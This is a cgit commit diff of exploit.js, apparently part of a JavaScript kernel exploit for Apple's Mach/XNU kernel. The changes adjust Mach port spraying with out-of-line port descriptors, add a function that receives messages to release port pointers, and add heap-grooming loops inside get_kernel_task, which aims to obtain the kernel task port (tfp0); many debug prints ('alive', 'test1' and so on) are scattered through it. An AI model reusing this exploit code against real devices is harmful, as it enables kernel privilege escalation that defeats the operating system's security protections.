summaryrefslogtreecommitdiff
path: root/src/js/kexp
diff options
context:
space:
mode:
Diffstat (limited to 'src/js/kexp')
-rwxr-xr-xsrc/js/kexp/exploit.js60
1 files changed, 50 insertions, 10 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index e0ef574..22f68ca 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -26,8 +26,10 @@ var req_head_msgh_reply_port = 0xc;
var req_head_msgh_id = 0x14;
var req_msgh_body_msgh_descriptor_count = 0x18;
var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
-var req_init_port_set_address = 0x0
-var req_init_port_set_count = 0x4
+var req_init_port_set_address = 0x0;
+var req_init_port_set_count = 0x4;
+var MACH_RCV_MSG = 0x2;
+var MACH_MSG_TIMEOUT_NONE = 0;
var task_self = 0;
var kslide = 0;
@@ -181,7 +183,7 @@ function spray(dict, size, port) {
var kp = 0;
function spray_ports(number_port_descs) {
- printf("spray_ports %d\n", number_port_descs);
+// printf("spray_ports %d\n", number_port_descs);
if (kp == 0) {
kp = malloc(4);
mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
@@ -191,11 +193,12 @@ function spray_ports(number_port_descs) {
var mp = malloc(4);
mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
- var rmp = read_u32(mp);
- mach_port_insert_right(task_self, rmp, rmp, MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
- send_ports(rmp, read_u32(kp), 2, number_port_descs);
- return mp;
+ send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ var ret = read_u32(mp);
+ free(mp);
+ return ret;
}
function fast_log2(n) {
@@ -242,8 +245,10 @@ function send_ports(target, payload, num, number_port_descs) {
new_buf_.push(tmp[3]);
new_buf_.push(0);
new_buf_.push(0);
- new_buf_.push(19);
new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
+ new_buf_.push(19);
+
+// printf("%x 0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,\n", new_buf_.length, new_buf_[zz]]);
var new_buf = fast_array_mul(new_buf_, number_port_descs);
@@ -267,11 +272,27 @@ function send_ports(target, payload, num, number_port_descs) {
free(buf);
- printf("%d %s\n", ret, mach_error_string(ret));
-
return ret;
}
+function release_port_ptrs(port) {
+ printf("alive\n");
+ var req = malloc(0x1c + (5 * 0xc) + 0x8);
+ for (var i = 0; i < (0x1c + (5 * 0xc) + 0x8); i += 4) {
+ write_u32(req + i, 0x0);
+ }
+ printf("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
+ printf("alive\n");
+ var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+ printf("alive\n");
+ // if (ret != KERN_SUCCESS) {
+ printf("mach_recv %d %s\n", ret, mach_error_string(ret));
+ printf("alive\n");
+ // }
+ free(req);
+ printf("alive\n");
+}
+
function get_kernel_task() {
var ret = 0;
var tfp0 = 0;
@@ -318,17 +339,36 @@ function get_kernel_task() {
prepare_ptr(big_buf, big_size, kptr, 256);
prepare_ptr(small_buf, small_size, kptr, 32);
+ sched_yield();
for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
var dummy = malloc(4);
spray(big_buf, big_size, dummy);
}
+ sched_yield();
for (var i = 0; i < PORTS_NUM; i++) {
write_u32(fp + (i << 2), spray_ports(i));
var dummy = malloc(4);
spray(small_buf, small_size, dummy);
}
+ sched_yield();
+ for (var i = 0; i < PORTS_NUM; i++) {
+ printf("test\n");
+ printf("test1\n");
+ printf("test2\n");
+ printf("test3\n");
+ printf("test4\n");
+ printf("test5\n");
+ printf("test6\n");
+ printf("test7\n");
+ printf("test8\n");
+ printf("test9\n");
+ printf("test10\n");
+ release_port_ptrs(read_u32(fp + (i << 2)));
+ printf("test11\n");
+ }
+
printf("get lucky\n");
return tfp0;
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 21:28:40 +0000